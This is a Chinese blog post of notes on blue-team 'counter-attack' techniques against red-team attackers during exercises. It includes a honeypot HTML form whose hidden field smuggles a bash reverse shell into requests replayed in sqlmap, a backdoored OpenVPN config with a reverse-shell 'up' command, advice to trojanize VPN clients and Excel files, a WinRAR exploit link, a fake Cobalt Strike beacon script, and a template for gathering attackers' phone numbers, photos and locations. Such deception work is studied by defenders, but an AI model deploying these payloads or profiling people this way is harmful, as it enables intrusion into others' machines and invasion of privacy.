初次接触反制技术,写一个文档作为记录。
条件:
1.攻击者登陆过社交媒体并且未退出账号
2.拥有相关媒体的jsonp接口
参考文章:
利用社交账号精准溯源的蜜罐技术
利用webrtc获取真实ip
JSONP探针
留几个文件下载链接,例如vpn客户端,并对正常程序进行木马植入。或者制作恶意的excel文档诱导其进行下载。
蜜罐中放置恶意安装包,参考文章DLL劫持+重新制作安装包在钓鱼与反钓鱼的利用
思路:放置一个邮件,提前告诉大家不要点,然后攻防演戏期间有人点了的话十有八九就是因为账号被控了。
post方式的利用:
页面代码:
<html>
<head>
<title> A sqlmap honeypot demo</title>
</head>
<body>
<input>search the user</input>
<form id="myForm" action="username.html" method="post" enctype="text/plain">
<input type='hidden' name='name'value='Robin&id=4567&command=shell`bash -i >&/dev/tcp/192.168.xxx.xxx/2333 0>&1`&port=1234'/>
<input type="button"οnclick="myForm.submit()" value="Submit">
</form>
</body>
</html>
burp截图:
如果红队成员不仔细看post数据,就有可能直接复制黏贴post请求放在sqlmap里面跑,这样子就会被蓝队控制,但如果直接复制包的所有数据用sqlmap -r命令的话是不会被控制的。
参考文章:注意了,使用sqlmap的你可能踩中了蜜罐
5. msf v=Metasploit 4.12.0-2016061501 to 4.12.0-2016083001
msf中直接有利用脚本,路径为exploit/multi/http/metasploit_static_secret_key_base。
可以在shodan上直接搜索互联网侧的msf:title:"metasploit is initializing"
参考文章:Metasploit 反序列化漏洞
浅谈蚁剑RCE
嵌入式浏览器安全杂谈-electron框架
中国蚁剑源码分析
论如何反击用AWVS的黑客
使用各种扫描工具的你,不但踩了“蜜罐”可能还要被团灭了
1.在蜜罐上配置一个后台管理系统的一个页面,让这个页面存在XSS漏洞。
参考文章:看蓝队如何干翻你,浅谈蓝队反制手段!
利用:https://github.com/WyAtu/CVE-2018-20250
我们可以在服务器上留下一个openvpn客户端的后门文件,里面的部分内容如下:
remote 192.168.31.137
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.31.138/9090 0<&1 2>&1&'"
只发送心跳包,让CS以为我们已经上线,这时候攻击者只会看到上线信息但无法执行任何命令。
利用代码:
import re
import time
import requests
def heartbeat():
url = "http://192.168.186.133:333/activity"
headers = {
'Cookie': 'IgyzGuIX0Jra5Ht45ZLYKyXWBnxfkNI3m6BOvExEPdWCuAv8fnY6HXKTygBOVdE34sDYusoDIjzHr/QR32mKsoVPb5NFMCHAtC7FLQUdSsZdufXjsd2dSqkGDcaZkcQYD1BssyjGZHTy42lT8oDpga3y1z5FMGRjobeksgaMX7M=',
'Host': '192.168.186.133:333',
'Accept': '*/*',
'Connection': 'Keep-Alive',
'Cache-Control': 'no-cache',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)'
}
resp = requests.get(url=url,headers=headers)
text = resp.content.hex()
return text
x = True
while x:
text = heartbeat()
lengs = len(text)
# print(lengs, " ", text)
if '2f4320' in text and '000041' in text:
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
commeds = re.findall(r'2f4320(.*?)000041', text)
for comm in commeds:
commed = bytes.fromhex(comm).decode('utf-8')
print(commed)
time.sleep(5)
脚本下载地址:fake_online
参考文章:看我如何模拟Cobalt Strike上线欺骗入侵者
1.对常见的dnslog平台进行屏蔽。
姓名/ID:
攻击IP:
地理位置:
QQ:
IP地址所属公司:
IP地址关联域名:
邮箱:
手机号:
微信/微博/src/id证明:
人物照片:
跳板机(可选):
关联攻击事件:
登陆受害机器进行信息收集
如果是linux可以查看命令执行历史与其他相关日志文件。
如果是windows可以查询ID == 4625审核失败的日志,后续通过对时间的排查、以及源IP地址、类型与请求的频率进行分析来判断是否是来源于内网的暴力破解,通过对logontype的数值确认就可以确认到底是通过什么协议进行暴力破解成功的。相对的数值关系:
local WINDOWS_RDP_INTERACTIVE = “2”
local WINDOWS_RDP_UNLOCK = “7”
local WINDOWS_RDP_REMOTEINTERACTIVE = “10”
local WINDOWS_SMB_NETWORK = “3”
1.针对IP或者域名通过公网已有的开放信息进行查询
https://x.threatbook.cn/
https://ti.qianxin.com/
https://ti.360.cn/
https://www.venuseye.com.cn/
https://community.riskiq.com/
3.定位目标
利用精确ip定位进行目标的位置定位。
4.收集互联网侧的用户ID
收集手机号与互联网上的各种ID信息(利用google hacking)。
5.进入跳板机进行信息收集
如果有能力控制了红队的跳板机,则可进入跳板机进行信息收集,查看命令执行的历史记录与日志等。
从OpenVPN配置文件中创建反弹Shell实现用户系统控制
- https://www.freebuf.com/articles/terminal/175862.html
对某攻击队的Webshell进行分析
- https://gh0st.cn/archives/2019-08-21/1
利用winrar漏洞
- https://github.com/WyAtu/CVE-2018-20250
看蓝队如何干翻你,浅谈蓝队反制手段!
- https://my.oschina.net/u/4579491/blog/4499994
浅谈蚁剑RCE
- https://xz.aliyun.com/t/8167
嵌入式浏览器安全杂谈-electron框架
- http://www.f4ckweb.top/index.php/archives/103/
中国蚁剑源码分析
- https://yzddmr6.tk/posts/antsword-diy-4/
论如何反击用AWVS的黑客
- https://www.freebuf.com/news/136476.html
- https://mp.weixin.qq.com/s?__biz=MzU2NTc2MjAyNg==&mid=2247484016&idx=1&sn=c4cd2db916f27a91fd179dbad78dd675&scene=21#wechat_redirect
- https://mp.weixin.qq.com/s?__biz=MzI3NTExMDc0OQ==&mid=2247483802&idx=1&sn=e4317bcbc3e78ddf4c2715298ef197f2&scene=21#wechat_redirect
JSON探针
- https://lcx.cc/post/4444/
蓝队实战溯源反制手册分享
- https://sec.nmask.cn/article_content?a_id=81963be55e7e0658827dca12219ddc75
攻防演练中防守方的骚姿势
- https://www.anquanke.com/post/id/219059
看我如何模拟Cobalt Strike上线欺骗入侵者
- https://k8gege.org/p/40523.html
- https://mp.weixin.qq.com/s/AZwKkEeTErPeOrkVH2Mirw
利用webrtc获取真实ip
- https://blog.csdn.net/leafrenchleaf/article/details/84743313
JSONP探针
- https://lcx.cc/post/4444/
作者:Shanfenglan7
原文链接:https://blog.csdn.net/qq_41874930/article/details/110178462